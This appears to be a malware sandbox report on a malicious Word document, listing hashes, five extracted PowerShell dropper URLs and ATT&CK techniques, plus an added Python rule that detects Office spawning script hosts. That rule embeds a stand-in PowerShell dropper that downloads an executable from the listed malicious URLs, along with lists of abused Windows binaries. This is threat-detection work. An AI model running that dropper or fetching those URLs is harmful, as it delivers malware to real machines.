General

  • Target

    19238030bfa5e60aab5222bad91f9bf06e4c9d1f8504f9d8ac409d9370e291d0.doc

  • Size

    152KB

  • Sample

    200127-j8j9x8y89s

  • MD5

    1ddb0331fd02844e81bd01dccfcbc960

  • SHA1

    0f27a86d6f4087ce36d1120fe9fde99ccc48768d

  • SHA256

    19238030bfa5e60aab5222bad91f9bf06e4c9d1f8504f9d8ac409d9370e291d0

  • SHA512

    236556ebd200c5e9d72d79d1c8ec65be41abdf52120553dcb9fafc0372cb170b66df523e59e98c0ac972c6a42c83eae42f0deef9fa91b35a7c6960bf8630b6a2

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Source

    URLs

  • exe.dropper

    http://yochina.apps.zeroek.com/assets/GQK9Gly/
    http://www.bandarwinsbobet.com/wp-admin/7bw/
    http://test.pakspaservices.com/wp-content/Yi1j6O7/
    http://portal.meucompromisso.com/wp-admin/kQJ/
    https://wondersofgeorgia.com/wp-admin/jv7hvg/

Targets

    • Target

      19238030bfa5e60aab5222bad91f9bf06e4c9d1f8504f9d8ac409d9370e291d0.doc

    • Process spawned unexpected child process
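The "Process spawned unexpected child process" signature above is the parent/child check every EDR and sandbox runs: an Office application such as WINWORD.EXE has no business starting a script host. The following is an added example (not the sandbox's own logic and not the sample's real macro or PowerShell) that implements that check over constructed process-creation events, decodes a PowerShell -EncodedCommand payload, and matches any URLs found against the exe.dropper list extracted in the report. The event records, the encoded script and the list of "suspicious" child images are assumptions made for the illustration.

```python
import base64
import re
from dataclasses import dataclass

# Office parents that should not be spawning script hosts or LOLBins (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children that are suspicious when the parent is an Office application (assumed list).
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# The exe.dropper URLs from the report's extracted config, used here as IOCs.
DROPPER_URLS = {
    "http://yochina.apps.zeroek.com/assets/GQK9Gly/",
    "http://www.bandarwinsbobet.com/wp-admin/7bw/",
    "http://test.pakspaservices.com/wp-content/Yi1j6O7/",
    "http://portal.meucompromisso.com/wp-admin/kQJ/",
    "https://wondersofgeorgia.com/wp-admin/jv7hvg/",
}


@dataclass
class ProcessEvent:
    """Minimal process-creation record (the fields Sysmon event 1 / EDR telemetry carry)."""
    pid: int
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(command_line: str) -> str:
    """Return the script behind -EncodedCommand (or its -e/-ec/-enc abbreviations),
    which PowerShell expects as base64 of UTF-16LE; otherwise return the line unchanged."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command_line, re.I)
    if not m:
        return command_line
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command_line


def extract_urls(text: str) -> list:
    """Pull http(s) URLs out of a (decoded) command line. '@' and '*' terminate a URL
    because droppers commonly join several download URLs with those separators."""
    return re.findall(r"https?://[^\s'\"@*,;()<>]+", text)


def defang(url: str) -> str:
    """Render a URL so it cannot be clicked or auto-linked when pasted into a report."""
    scheme, rest = url.split("://", 1)
    host, _, path = rest.partition("/")
    return f"{scheme.replace('http', 'hxxp')}://{host.replace('.', '[.]')}/{path}"


def detect(events) -> list:
    """Flag Office -> script-host chains and enrich each hit with any URLs in the
    child's (decoded) command line that match the extracted dropper list."""
    hits = []
    for ev in events:
        if basename(ev.parent_image) not in OFFICE_PARENTS:
            continue
        if basename(ev.image) not in SUSPICIOUS_CHILDREN:
            continue
        script = decode_encoded_command(ev.command_line)
        urls = extract_urls(script)
        hits.append({
            "pid": ev.pid,
            "chain": f"{basename(ev.parent_image)} -> {basename(ev.image)}",
            "urls": [defang(u) for u in urls],
            "known_dropper_urls": sorted(u for u in urls if u in DROPPER_URLS),
        })
    return hits


# Constructed sample telemetry. The encoded script is a hand-written stand-in for a
# dropper that walks a '@'-separated URL list; it is NOT this sample's real payload.
SAMPLE_SCRIPT = (
    "$u='http://yochina.apps.zeroek.com/assets/GQK9Gly/@"
    "http://www.bandarwinsbobet.com/wp-admin/7bw/'.Split('@');"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\a.exe');break}catch{}}"
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ProcessEvent(1001, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\explorer.exe", '"WINWORD.EXE" /n invoice.doc'),
    # splwow64 is a legitimate Word child (printing) and must not fire.
    ProcessEvent(1002, r"C:\Windows\splwow64.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "splwow64.exe 12288"),
    ProcessEvent(1003, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 f"powershell -nop -w hidden -enc {SAMPLE_ENCODED}"),
    # PowerShell under cmd.exe is normal admin activity, not an Office chain.
    ProcessEvent(1004, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\cmd.exe", "powershell -ExecutionPolicy Bypass -File build.ps1"),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Only the WINWORD.EXE -> powershell.exe event is reported; the decoded command line yields two of the five dropper URLs, which is how a single process-tree hit gets tied back to the network IOCs in the extracted config. The parent/child allow-list is deliberately narrow: broadening OFFICE_PARENTS to every Office binary, or matching on the image path rather than the base name, is the usual next step in a production rule.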

MITRE ATT&CK Matrix (ATT&CK v6)

  • Discovery

    Technique                      ID     Count
    Query Registry                 T1012  2
    System Information Discovery   T1082  2

Tasks